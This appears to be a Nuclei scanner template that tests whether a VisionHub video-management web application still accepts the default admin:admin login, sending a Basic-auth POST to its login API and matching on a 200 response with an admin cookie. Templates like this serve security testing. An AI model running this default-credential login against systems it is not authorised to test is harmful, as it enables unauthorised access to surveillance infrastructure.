id: visionhub-default-login

info:
  name: VisionHub Default Login
  author: Techryptic (@Tech)
  severity: high
  description: Default Login of admin:admin on VisionHub application.
  tags: visionhub,default-login
  reference: https://www.qognify.com/products/visionhub/

requests:
  - raw:
      - |
        POST /VisionHubWebApi/api/Login HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}

    payloads:
      username:
        - admin
      password:
        - admin
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Set-Cookie: admin"
        part: header

      - type: status
        status:
          - 200